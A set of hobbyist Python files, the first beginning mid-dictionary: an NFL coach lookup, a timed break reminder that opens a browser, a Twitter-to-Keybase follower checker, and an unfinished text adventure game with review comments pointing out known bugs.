    "Atlanta Falcons": "Dan Quinn",
    "Baltimore Ravens": "John Harbaugh",
    "Buffalo Bills": "Sean McDermott",
    "Carolina Panthers": "Ron Rivera",
    "Chicago Bears": "John Fox",
    "Cincinnati Bengals": "Marvin Lewis",
    "Cleveland Browns": "Hue Jackson",
    "Dallas Cowboys": "Jason Garrett",
    "Denver Broncos": "Vance Joseph",
    "Detroit Lions": "Jim Caldwell",
    "Green Bay Packers": "Mike McCarthy",
    "Houston Texans": "Bill O'Brien",
    "Indianapolis Colts": "Chuck Pagano",
    "Jacksonville Jaguars": "Doug Marrone",
    "Kansas City Chiefs": "Andy Reid",
    "Los Angeles Chargers": "Anthony Lynn",
    "Los Angeles Rams": "Sean McVay",
    "Miami Dolphins": "Adam Gase",
    "Minnesota Vikings": "Mike Zimmer",
    "New England Patriots": "Bill Belichick",
    "New Orleans Saints": "Sean Payton",
    "New York Giants": "Ben McAdoo",
    "New York Jets": "Todd Bowles",
    "Oakland Raiders": "Jack Del Rio",
    "Philadelphia Eagles": "Doug Pederson",
    "Pittsburgh Steelers": "Mike Tomlin",
    "San Francisco 49ers": "Kyle Shanahan",
    "Seattle Seahawks": "Pete Carroll",
    "Tampa Bay Buccaneers": "Dirk Koetter",
    "Tennessee Titans": "Mike Mularkey",
    "Washington Redskins": "Jay Gruden",
}
# Prompt for a team name, report its coach, then exit; EOF quits cleanly.
while True:
    try:
        team = input("Please enter a NFL Team: ")
        print()
    except EOFError:
        sys.exit(0)  # no more input: quit without an error
    try:
        coach = coaches[team]
    except KeyError:
        print("Sorry, \"", team, "\" is not a team in the NFL.", sep="")
        print()
        continue #Go back up to the word "while".
    # Fixed the output message: the old one printed "is" twice ("team is X
    # is:"), and str.capitalize() lowercased every word after the first,
    # mangling multi-word team names -- echo the name exactly as entered.
    print("The coach of the NFL team ", team, " is: ", coach, ".", sep="")
    print()
    sys.exit(0)
|
import time
import pyglet
import os
import webbrowser
def disp_start():
    """Print a timestamped program-start banner."""
    print("Program Start at %s" % time.ctime())
def disp_end():
    """Print a timestamped program-end banner."""
    print("Program End at %s" % time.ctime())
def run_app(path):
    """Play the video at `path` in a pyglet window sized to the stream."""
    player = pyglet.media.Player()
    source = pyglet.media.load(path)
    video_format = source.video_format
    window = pyglet.window.Window(width=video_format.width, height=video_format.height)
    player.queue(source)
    player.play()
    print(player.get_texture())

    @window.event
    def on_draw():
        # Redraw the current video frame at the window origin.
        window.clear()
        player.get_texture().blit(0, 0)

    # Blocks until the window is closed, then shuts the app loop down.
    pyglet.app.run()
    pyglet.app.exit()
def main():
    """Open the break-reminder URL in a browser 5 times, 30 minutes apart."""
    # `path` is only used by the commented-out run_app() call below.
    path = os.path.join(os.getcwd(),'media','aLIEz.mp4')
    url = 'https://music.163.com/#/video?id=969875A89904E2F4D88B672F62036D53&userid=1290932071'
    disp_start()
    break_times = 5   # total number of breaks
    break_count = 0
    while break_count < break_times:
        #run_app(path)
        webbrowser.open(url)
        time.sleep(30*60)  # 30-minute interval between breaks
        break_count += 1

if __name__ == '__main__':
    main()
import requests
import re, ast
import os, sys, shutil
from subprocess import call
import json, time
from zipfile import ZipFile, is_zipfile
# Files
folders = [r'results', r'results/temp']
for f in folders:
    if not os.path.exists(f):
        os.makedirs(f)

# Find the data file(s) in data/: prefer a Twitter-archive zip, otherwise
# fall back to loose .js files; collect their names into allFiles.
allFiles = []
datadir = 'data'
filesToExtract = ['following.js', 'follower.js']
zipFound = False
for filename in os.listdir(datadir):
    # Build the path from the directory entry under inspection. (The previous
    # version interpolated a stale placeholder instead of `filename`, which
    # was otherwise unused, so no zip was ever detected.)
    fileAtLocation = f"{datadir}/{filename}"
    if is_zipfile(fileAtLocation):
        zipFound = True
        with ZipFile(fileAtLocation, 'r') as unzipped:
            for f in filesToExtract:
                try:
                    unzipped.extract(f, datadir)
                    allFiles.append(f)
                except KeyError:
                    # Archive doesn't contain this member; skip it.
                    pass
if not zipFound:
    for filename in os.listdir(datadir):
        if '.js' in filename:
            allFiles.append(filename)

# set the results file
parsedUsernames = 'results/temp/parsedUsernames.txt'
resultsOut = 'results/onKeybase.txt'
open(parsedUsernames, 'a').close() # makes file if it doesn't exist

# set Twitter lookup URL
url_head = 'https://twitter.com/intent/user?user_id='
# get the Twitter userID list data
def getData(readFile):
    """Parse one Twitter-archive .js file into a Python object.

    Strips the "window.YTD... = " prefix from the first line, stages the
    cleaned text in a temp file, then literal-evals the whole payload.
    """
    writeFile = 'results/temp/data.txt'
    with open(readFile, 'r') as src, open(writeFile, 'w') as dst:
        for lineno, text in enumerate(src):
            if lineno == 0:
                # Keep only what follows "= " (the start of the payload).
                dst.write(re.findall('= (.*)', text)[0] + '\n')
            else:
                dst.write(text)
    with open(writeFile, 'r') as staged:
        return ast.literal_eval(staged.read())
# Merge every discovered data file into one list of follow records.
dataIn = []
try:
    for f in allFiles:
        datafile = f"{datadir}/{f}"
        dataIn.extend(getData(datafile))
except NameError:
    # NOTE(review): allFiles/datadir are always bound above, so it is unclear
    # which NameError this guards -- presumably a missing-data condition;
    # confirm and consider catching FileNotFoundError instead.
    print("Error: Data file is missing from 'data/' directory.")
    sys.exit(1)
# Processing functions
def processedUsers():
    """Load previously-resolved users from the on-disk cache.

    Returns (ids, raw_records, id->username dict); an empty or corrupt cache
    file yields empty results.
    """
    with open(parsedUsernames, 'r') as cache:
        try:
            records = ast.literal_eval(cache.read().replace('\n', ''))
        except SyntaxError:
            records = []  # cache empty or unparsable: start fresh
    ids, lookup = [], {}
    for record in records:
        for user_id, username in record.items():
            ids.append(user_id)
            lookup[user_id] = username
    return ids, records, lookup
def fetchUsername(allUserIDs):
    """Resolve Twitter numeric user IDs to @usernames.

    Consults the on-disk cache first, then scrapes Twitter's intent page.
    Aborts after `attempts` consecutive failed lookups (rate limiting).
    """
    timeout = 0    # consecutive failed lookups so far
    attempts = 10  # max consecutive failures before giving up
    allUsernames = []
    count = len(allUserIDs)
    processedUserIDs, processed, lookupDict = processedUsers()
    pingMsg, fileMsg = "pinging Twitter...", "(from file) |"
    while len(allUserIDs) > 0:
        # logic for loop counter
        if timeout >= attempts:
            time.sleep(1)
            # `data` is the last requests.Response; reaching here requires at
            # least `attempts` prior requests, so it is bound.
            http_error = data.status_code
            print(f"Twitter endpoint exhausted. Please try again in 1 minute.")
            print(f"([HTTP {http_error} Code] for reference)\n")
            sys.exit(10)
        userid = allUserIDs.pop(0)
        # check processed file first for userid
        if userid in processedUserIDs:
            username = lookupDict[userid]
            allUsernames.append(username)
            print(f"{fileMsg} {len(allUsernames)} of {count}: @{lookupDict[userid]}")
            continue
        # ping Twitter if userid not found in processed file
        time.sleep(0.1)
        print(pingMsg)
        url = url_head + userid
        data = requests.get(url)
        try:
            # Username appears in the page title as "(@name) on Twitter".
            username = re.findall("\(@(.*?)\) on Twitter", data.text.replace("\n", ""))[0]
            allUsernames.append(username)
            userDict = {userid: username}
            processed.append(userDict)
            print(end="\033[F")  # move cursor up to overwrite the ping line
            print(f"{pingMsg} {len(allUsernames)} of {count}: @{username}")
            # Persist the growing cache; 'r+' overwrites from the start, which
            # is safe because str(processed) only ever gets longer.
            with open(parsedUsernames, 'r+') as p:
                p.write(str(processed))
            timeout = 0
        except IndexError: # Twitter times out around every 100 lookups
            warn, bold, _end= '\033[93m', '\033[1m', '\033[0m'
            dots = [". ", ".. ", "..."]
            if timeout == 0:
                print(f"{warn}{len(allUsernames)+1} of {count}: userID #{userid} failed{_end}")
            else:
                print(end="\033[F" * 5)  # rewind the retry banner lines
            timeout += 1
            # Put the ID back so it is retried on the next iteration.
            allUserIDs.insert(0, userid)
            print(f"\nTwitter request limit temporarily exceeded.", \
                f"Will try {bold}{attempts} attempts{_end} to regain connection.")
            print(f"(Attempt {warn}#{timeout} of {attempts}{_end}), please wait{dots[timeout%3]}\n")
    return allUsernames
def fetchKeybase(my_followers):
    """Check each Twitter username against Keybase via the `keybase id` CLI
    and return the usernames that resolved."""
    scraped = 'results/temp/scrape.txt'
    filtered = 'results/temp/filtered.txt'
    # Scrape twitter usernames against Keybase
    open(scraped, 'w').close() # creates/clears file
    for i, foll in enumerate(my_followers):
        callable = foll + "@twitter"
        print(f"Retrieving {i+1} of {len(my_followers)}: {callable}...")
        with open(scraped, 'a') as s:
            call(["keybase", "id", callable], stdout=s, stderr=s)
    # Filter out names not found
    open(filtered, 'w').close() # creates/clears file
    check = 'No resolution found'
    with open(scraped, 'r') as s:
        for line in s:
            if check not in line:
                with open(filtered, 'a') as f:
                    f.write(line)
    # Extract usernames as list from filtered data
    with open(filtered, 'r') as f:
        data = f.read().replace('\n', '')
    # NOTE(review): the pattern ends in a non-greedy group, so `(.*?)` always
    # matches the EMPTY string and every hit captures ''. A terminator after
    # the group (e.g. the closing ANSI escape) is needed to capture actual
    # usernames -- confirm against real `keybase id` output.
    usernamesOnKeybase = re.findall("Identifying \[1m(.*?)", data)
    # Clean up temp files
    shutil.rmtree("results/temp")
    return usernamesOnKeybase
def getTwitterUsernames():
    """Collect the unique account IDs from dataIn (first-seen order kept)
    and resolve them to Twitter usernames."""
    # dict.fromkeys dedupes in O(n) while preserving insertion order
    # (the previous list-membership loop was O(n^2)).
    unique_ids = dict.fromkeys(
        entry[list(entry.keys())[0]]['accountId'] for entry in dataIn)
    return fetchUsername(list(unique_ids))
def run():
    """End-to-end pipeline: resolve Twitter IDs to usernames, check them on
    Keybase, and write the matches to resultsOut."""
    allUsernames = getTwitterUsernames() #replace this assignment if alternative Twitter list source
    usernamesOnKeybase = fetchKeybase(allUsernames)
    # Write usernames list to file
    usernamesJSON = json.dumps(usernamesOnKeybase, indent=2)
    with open(resultsOut, 'w') as results:
        results.write(f"usernames = {usernamesJSON}")
    b, _b = '\033[1m', '\033[0m'  # ANSI bold on/off
    print(f"\n\nYOU HAVE {len(usernamesOnKeybase)} TWITTER USERS ON KEYBASE:\n{usernamesJSON[1:-3]}")
    print(f"\n*** Usernames on Keybase have been placed at {b}'{resultsOut}'{_b}. ***\n")

if __name__ == "__main__":
    run()
|
"""
Game Version Info:
[Major build number].[Minor build number].[Revision].[Package]
i.e. Version: 1.0.15.2
Major build number: This indicates a major milestone in the game, increment this when going from beta to release, from
release to major updates.
Minor build number: Used for feature updates, large bug fixes etc.
Revision: Minor alterations on existing features, small bug fixes, etc.
Package: Your code stays the same, external library changes or asset file update."""
import random
import sys
# import pickle
import shelve
import time
from Actors_2 import player, Creature
# Key constants for the room dicts below. UP/DOWN/LEFT/RIGHT are TUPLES of
# command synonyms, used as dict keys in `rooms`.
ZONENAME = ''
DESCRIPTION = 'description'
EXAMINATION = 'examine'
SOLVED = False
UP = 'up', 'north'
DOWN = 'down', 'south'
LEFT = 'left', 'west'
RIGHT = 'right', 'east'
# Per-room puzzle-solved flags.
# NOTE(review): only a1-d4 are listed, while `rooms` below also defines
# a5/b5/c5/d5 and the e-row -- confirm whether those need entries too.
solved_places = {'a1': False, 'a2': False, 'a3': False, 'a4': False,
                 'b1': False, 'b2': False, 'b3': False, 'b4': False,
                 'c1': False, 'c2': False, 'c3': False, 'c4': False,
                 'd1': False, 'd2': False, 'd3': False, 'd4': False,
                 }
rooms = {
'a1': {
ZONENAME: "Town Market",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b1',
LEFT: '',
RIGHT: 'a2',
},
'a2': {
ZONENAME: "Town Entrance",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b2',
LEFT: 'a1',
RIGHT: 'a3',
},
'a3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b3',
LEFT: 'a2',
RIGHT: 'a4',
},
'a4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b4',
LEFT: 'a3',
RIGHT: 'a5',
},
'a5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: 'b5',
LEFT: 'a4',
RIGHT: '',
},
'b1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a1',
DOWN: 'c1',
LEFT: '',
RIGHT: 'b2',
},
'b2': {
ZONENAME: "Home",
DESCRIPTION: 'This Is Your Home',
EXAMINATION: 'Your Home Looks The Same - Nothing Has Changed',
SOLVED: False,
UP: 'a2',
DOWN: 'c2',
LEFT: 'b1',
RIGHT: 'b3',
},
'b3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a3',
DOWN: 'c3',
LEFT: 'b2',
RIGHT: 'b4',
},
'b4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a4',
DOWN: 'c4',
LEFT: 'b3',
RIGHT: 'b5',
},
'b5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'a5',
DOWN: 'c5',
LEFT: 'b4',
RIGHT: '',
},
'c1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b1',
DOWN: 'd1',
LEFT: '',
RIGHT: 'c2',
},
'c2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b2',
DOWN: 'd2',
LEFT: 'c1',
RIGHT: 'c3',
},
'c3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b3',
DOWN: 'd3',
LEFT: 'c2',
RIGHT: 'c4',
},
'c4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b4',
DOWN: 'd4',
LEFT: 'c3',
RIGHT: 'c5',
},
'c5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'b5',
DOWN: 'd5',
LEFT: 'c4',
RIGHT: '',
},
'd1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c1',
DOWN: 'e1',
LEFT: '',
RIGHT: 'd2',
},
'd2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c2',
DOWN: 'e2',
LEFT: 'd1',
RIGHT: 'd3',
},
'd3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c3',
DOWN: 'e3',
LEFT: 'd2',
RIGHT: 'd4',
},
'd4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c4',
DOWN: 'e4',
LEFT: 'd3',
RIGHT: 'd5',
},
'd5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: 'c5',
DOWN: 'e5',
LEFT: 'd4',
RIGHT: '',
},
'e1': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e2': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e3': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e4': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
'e5': {
ZONENAME: " ",
DESCRIPTION: 'description',
EXAMINATION: 'examine',
SOLVED: False,
UP: '',
DOWN: '',
LEFT: '',
RIGHT: '',
},
}
"""
Old
rooms = {
1: {"name": "1", "d": 2, "s": 6},
2: {"name": "2", "d": 3, "s": 7, "a": 1},
3: {"name": "3", "d": 4, "a": 2},
4: {"name": "4", "d": 5, "s": 9, "a": 3},
5: {"name": "5", "s": 10, "a": 4},
6: {"name": "6", "d": 7, "s": 11, "w": 1},
7: {"name": "7", "a": 6, "s": 12, "w": 2},
8: {"name": "8", },
9: {"name": "9", "d": 10, "s": 14, "w": 4},
10: {"name": "10", "s": 15, "a": 9, "w": 5},
11: {"name": "11", "d": 12, "s": 16, "w": 6},
12: {"name": "12", "d": 13, "s": 17, "a": 11, "w": 7},
13: {"name": "13", "d": 14},
14: {"name": "14", "d": 15, "s": 19, "a": 13, "w": 9, "item": "key"},
15: {"name": "15", "a": 14, "s": 20, "w": 10},
16: {"name": "16", "d": 17, "s": 21, "w": 11},
17: {"name": "17", "d": 18, "a": 16, "s": 22, "w": 12},
18: {"name": "18", "d": 19, "a": 18, "s": 23, "w": 13},
19: {"name": "19", "d": 20, "a": 17, "s": 24, "w": 14},
20: {"name": "20", "a": 19, "s": 25, "w": 15},
21: {"name": "21", "d": 22, "w": 16},
22: {"name": "22", "d": 23, "a": 21, "w": 17},
23: {"name": "23", "d": 24, "a": 22, "w": 18},
24: {"name": "24", "d": 25, "a": 23, "w": 19},
25: {"name": "25", "a": 24, "w": 20}
}"""
# Global game state.
potion = (random.randint(0, 100))  # random potion roll (0-100)
mypos = 1
# epos = random.choice(rooms)
Player_Lvl = 0
extra_health = int(Player_Lvl) * 5  # +5 max health per player level
health = 100 + int(extra_health)
healthe = 10   # presumably enemy health -- confirm where it is consumed
Currency = 0
kill = 0       # regular-enemy kill counter
boss_kill = 0  # boss kill counter
# NOTE(review): `rooms` is keyed by strings ('a1', ...) but the starting
# position is the int 1 -- confirm where the location gets normalized before
# it is used as a rooms key (e.g. in print_location()).
current_room = mypos
myPlayer = player()
myPlayer.level = Player_Lvl
inventory = []
Xp = 0
def title_screen_selection():
    """Read a title-menu command and dispatch it (play/help/quit).

    Re-prompts until the input is one of the recognized commands, then runs
    the matching handler exactly once. (The previous version duplicated the
    whole if/elif dispatch before and inside the retry loop.)
    """
    dispatch = {'play': setup_game, 'help': help_menu, 'quit': quit_game_1}
    option = input("> ").lower()
    while option not in dispatch:
        print("Please Enter A Valid Command")
        option = input("> ").lower()
    dispatch[option]()
def title_screen():
    """Draw the title banner, then hand control to the menu prompt."""
    for row in ('__________________________________',
                '_ Welcome To The Random Text RPG _',
                '__________________________________',
                ' _ Play _ ',
                ' _ Help _ ',
                ' _ Quit _ '):
        print(row)
    title_screen_selection()
def help_menu():
    """Show the quick-help screen, then continue to the full command list
    or return to the title screen.

    Fix: the original also called title_screen_selection() after
    title_screen()/controls_1() had already prompted for input, which
    produced a duplicate input prompt.
    """
    print('__________________________________')
    print('_ Welcome To The Random Text RPG _')
    print('__________________________________')
    print('- Use Up, Down, Left, Right To Move -')
    print('- Type Your Commands To Do Them -')
    print('- Use "Look" To Inspect Something -')
    print('- Good Luck And Have Fun! -')
    print('- Continue For All Commands')
    help_action = input('Continue? Y/N \n' + '> ')
    acceptable_help = ['y', 'n', 'yes', 'no', 'continue']
    while help_action.lower() not in acceptable_help:
        print("Unknown Action, Try Again.\n")
        help_action = input('Continue? Y/N \n' + '> ')
    if help_action.lower() in ['y', 'yes', 'continue']:
        controls_1()
    else:
        title_screen()
def print_location():
    """Render the player's current zone name and description in an ASCII box."""
    room = rooms[myPlayer.location]
    border = '_' * (4 + len(room[DESCRIPTION]))
    print('\n' + border)
    print('| ' + room[ZONENAME].upper() + ' ' * (len(room[DESCRIPTION])) + '|')
    print('| ' + room[DESCRIPTION] + ' |')
    print(border)
def prompt():
    """Top-level in-game prompt: read one action and dispatch it.

    Fix: 'commands' was handled by the help branch below but was missing
    from acceptable_actions, so the validation loop made it unreachable.
    """
    print("\n" + "__________________________")
    print("What Would You Like To Do?")
    action = input("> ")
    acceptable_actions = ['move', 'go', 'travel', 'walk', 'quit', 'examine', 'inspect', 'interact', 'look', 'level',
                          'help', 'control', 'controls', 'commands', 'test', 'location', 'position', 'die', 'xp']
    while action.lower() not in acceptable_actions:
        print("Unknown Action, Try Again.\n")
        action = input("> ")
    if action.lower() == 'quit':
        quit_game_2()
    elif action.lower() in ['move', 'go', 'travel', 'walk']:
        player_move(action.lower())
    elif action.lower() in ['examine', 'inspect', 'interact', 'look']:
        player_examine(action.lower())
    elif action.lower() in ['help', 'control', 'controls', 'commands']:
        controls_2()
    elif action.lower() in ['test']:
        player_test()
    elif action.lower() in ['location', 'position']:
        print_location()
    elif action.lower() in ['die']:
        die()
    elif action.lower() in ['level']:
        print(Player_Lvl)
    elif action.lower() in ['xp']:
        print(Xp)
def player_move(myAction):
    """Ask for a direction and move the player to the adjacent room.

    Fix: an unrecognised direction was silently ignored; it is now reported.
    `myAction` (the verb the player typed) is kept for interface compatibility.
    """
    dest = input("Where Would You Like To Move To?\n> ")
    # Map every accepted spelling onto the room-dict direction key.
    direction_keys = {
        'up': UP, 'north': UP, 'u': UP, 'n': UP,
        'down': DOWN, 'south': DOWN, 'd': DOWN, 's': DOWN,
        'left': LEFT, 'west': LEFT, 'l': LEFT, 'w': LEFT,
        'right': RIGHT, 'east': RIGHT, 'r': RIGHT, 'e': RIGHT,
    }
    if dest in direction_keys:
        destination = rooms[myPlayer.location][direction_keys[dest]]
        movement_handler(destination)
    else:
        print("That Is Not A Direction.")
def movement_handler(destination):
    """Announce the move, relocate the player, and reprint the location box."""
    print("\n" + "You Have Moved To The " + destination.title() + ".")
    myPlayer.location = destination
    print_location()
def player_examine(action):
    """Report whether the current zone still has an interaction available."""
    if not rooms[myPlayer.location][SOLVED]:
        print("You Can Trigger A Puzzle Here.")
    else:
        print("You Have Already Exhausted This Zone.")
def player_test():
    """Debug helper: echo back a chosen player attribute."""
    chosen = input("What Do You Want To Test?\n> ")
    if chosen == 'name':
        print("Name Is " + myPlayer.name)
    elif chosen in ('class', 'job', 'role'):
        print("Class Is " + myPlayer.job.title())
def quit_game_1():
    """Confirm quitting from the title screen.

    Fix: on 'no' the original called title_screen_selection() after
    title_screen() had already invoked it, producing a double prompt.
    """
    quitting = input("Are You Sure You Want To Quit?\n> ")
    if quitting in ['yes', 'continue', 'y']:
        quit()
    elif quitting in ['no', 'n']:
        title_screen()
def quit_game_2():
    """Confirm quitting from inside the game; 'no' resumes the main loop."""
    answer = input("Are You Sure You Want To Quit?\n> ")
    if answer in ('yes', 'continue', 'y'):
        quit()
    elif answer in ('no', 'n'):
        main_game_loop()
def restart():
    """Offer a restart after the player dies; 'no' closes the game.

    Fix: on 'yes' the original called title_screen_selection() after
    title_screen() had already invoked it, producing a double prompt.
    """
    restarting = input("______________________________\nDo You Want To Restart?\n> ")
    if restarting in ['yes', 'continue', 'y']:
        title_screen()
    elif restarting in ['no', 'n']:
        print("______________________________\nClosing Game")
        quit()
def main_game_loop():
    """Keep prompting the player for actions until the game-over flag flips."""
    while True:
        if myPlayer.game_over is not False:
            break
        prompt()
def print_header():
    """Print the startup banner shown before the game begins."""
    banner = (
        "Version: Development",
        '_________________________________',
        "Welcome To This Game",
        "Type 'Help' For Commands",
        "Type 'Quit' To Exit",
        "Commands Are Not Case Sensitive",
        "To Save Choose Save1, Save2, Or Save3",
        '_________________________________',
        "",
    )
    print("\n".join(banner))
def controls_print():
    """Print the full command reference shared by both help entry points."""
    divider = "________________________________________"
    print(divider + "\nAll Commands\n" + divider)
    print("Use = Use an Item")
    print(divider + "\n1)Movement:\nGo, Move, Travel, Walk\n2)Directions:\n"
          "(North, Up, N, U)\n(West, Left, W, L)\n(East, Right, E, R)\n(South, Down, S, D)")
    print(divider + "\nExamine, Look, Inspect Interact () = Look At A Object")
    print(divider)
    print("Quit, Leave, Exit, Close = Exit The Game")
def controls_1():
    """Show the command list from the help menu, then return to the title screen.

    Fixes: the trailing `if` after the validation loop was always true and is
    removed; the original also called title_screen_selection() after
    title_screen() had already invoked it, producing a double prompt.
    """
    controls_print()
    controls_1_action = input('Continue?\n' + '> ')
    while controls_1_action.lower() not in ('y', 'yes', 'continue'):
        print("Unknown Action, Try Again.\n")
        controls_1_action = input('Continue?\n' + '> ')
    title_screen()
def controls_2():
    """Show the command list mid-game, then resume the main game loop."""
    controls_print()
    answer = input('Continue?\n' + '> ')
    # Loop until an affirmative answer arrives; the loop guard guarantees the
    # final answer is acceptable, so we can resume unconditionally afterwards.
    while answer.lower() not in ('y', 'yes', 'continue'):
        print("Unknown Action, Try Again.\n")
        answer = input('Continue?\n' + '> ')
    main_game_loop()
def die():
    """Let the player pick a (placeholder) way to die, print a message, and
    offer a restart.

    Improvement: every branch of the original wrapped a single-item list in
    identical random.choice boilerplate; the messages now live in one table.
    random.choice still matters only for 'inside', which has two messages.
    Also fixes the invalid '\\_' escape in the shrug emoticon (output unchanged).
    """
    death_messages = {
        'hang': ["hang"],                # TODO: check inventory for rope
        'hang myself': ["hang"],
        'shoot': ["shoot"],              # TODO: check inventory for gun
        'shoot myself': ["shoot"],
        'starve': ["starve"],
        'starve myself': ["starve"],
        'dehydrate': ["dehydrate"],
        'fall': ["fall"],                # TODO: check area for a place to jump
        'jump': ["fall"],
        'stab': ["stab"],                # TODO: check inventory for knife/sword
        'inside': ['You Believe You Are Dead Because All The "Pain" You Have Suffered Through',
                   'You Gave Up The Will To Live'],  # TODO: add random quotes
    }
    # 'disaster' was accepted by the original but had no handler; keep that
    # behaviour (accepted, does nothing) until a handler exists.
    acceptable_die = list(death_messages) + ['disaster']
    die_action = input('How Do You Want To Die?\n> ')
    while die_action.lower() not in acceptable_die:
        print('Not A Way To Die Here...Sorry ¯\\_(ツ)_/¯')
        die_action = input('How Do You Want To Die?\n> ')
    messages = death_messages.get(die_action.lower())
    if messages:
        print(random.choice(messages))
        restart()
def position():
    """Describe the player's current room, inventory, and any visible item."""
    room = rooms[current_room]
    print("___________________________")
    print("You are in the " + room["name"])
    print("Inventory : " + str(inventory))
    if "item" in room:
        print("You see a " + room["item"])
    print("___________________________")
def game_loop():
    """Coordinate-based exploration/battle loop (older system, distinct from
    main_game_loop/prompt above).

    NOTE(review): indentation was reconstructed from a whitespace-mangled
    source -- confirm the nesting against the original file.
    """
    global healthe
    global action
    global epos
    global mypos
    global potion
    global Xp
    # Placeholder enemy roster; `Creature` is defined elsewhere in the file.
    creatures = [
        Creature('Random PlaceHolder Name', 1),
        Creature('c2', 1),
        Creature('c3', 1),
        Creature('c4', 1),
        Creature('c5', 1),
        Creature('c6', 1),
    ]
    while True:
        global current_room
        print()
        position()
        # Re-defined on every loop iteration; closes over `creatures`.
        def battle_sequence():
            global healthe
            global action
            Random_Creature = random.choice(creatures)
            print("You Are Fighting A {}".format(Random_Creature))
            print("Battle Has Started")
            # `healthe` is the ENEMY's health (module global, starts at 10).
            while healthe >= 0:
                action = input('What Is Your Move? : ')
                print()
                if action == "a":
                    healthe = healthe - 1
                    print("Enemy Health Is {}".format(healthe))
                    if healthe == 0:
                        healthe = 10  # reset enemy health for the next battle
                        print("You Have Won!")
                        print()
                        break
                print()
        if epos == mypos:
            # NOTE(review): `epos` is only assigned below (and in commented-out
            # startup code), so the first read may raise NameError -- confirm.
            print("Enemy Is Here")
            battle_sequence()
            epos = (random.choice(rooms))
            print("Enemy {}".format(epos))
        if potion == 0:
            potion = potion + 1
            print("You Are Out Of Potions")
        elif action == "e" or action == "E":
            # Drink a potion.
            potion = potion - 1
            print("You Have {} Potions Remaining".format(potion))
        # elif action == "West" or action == "WEST" or action == "west" or action == "a" or action == "A":
        #     myxpos = myxpos - 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "East" or action == "EAST" or action == "east" or action == "d" or action == "D":
        #     myxpos = myxpos + 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "South" or action == "SOUTH" or action == "south" or action == "s" or action == "S":
        #     myypos = myypos - 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "North" or action == "NORTH" or action == "north" or action == "w" or action == "W":
        #     myypos = myypos + 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "q" or action == "Q":
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "Northwest" or action == "NORTHWEST" or action == "northwest" or action == "wa" or action == "WA":
        #     myxpos = myxpos - 1
        #     myypos = myypos + 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "NORTHEAST" or action == "Northeast" or action == "northeast" or action == "wd" or action == "WD":
        #     myxpos = myxpos + 1
        #     myypos = myypos + 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "sa" or action == "SA":
        #     myxpos = myxpos - 1
        #     myypos = myypos - 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        # elif action == "sd" or action == "SD":
        #     myxpos = myxpos + 1
        #     myypos = myypos - 1
        #     print("You Are Standing At {},{}".format(myxpos, myypos))
        elif action == "v":
            # Debug command: grant an XP lump, then recompute the level bracket
            # (each bracket is twice as wide as the previous one).
            Xp = Xp + 10000
            print("My Xp {}".format(Xp))
            # NOTE(review): Player_Lvl is assigned without a `global` statement,
            # so these writes create a function-local and never update the
            # module-level Player_Lvl -- likely a bug; confirm intent.
            if 0 <= Xp <= 9:
                Player_Lvl = 0
            elif 10 <= Xp <= 39:
                Player_Lvl = 1
            elif 40 <= Xp <= 79:
                Player_Lvl = 2
            elif 80 <= Xp <= 159:
                Player_Lvl = 3
            elif 160 <= Xp <= 319:
                Player_Lvl = 4
            elif 320 <= Xp <= 639:
                Player_Lvl = 5
            elif 640 <= Xp <= 1279:
                Player_Lvl = 6
            elif 1280 <= Xp <= 2559:
                Player_Lvl = 7
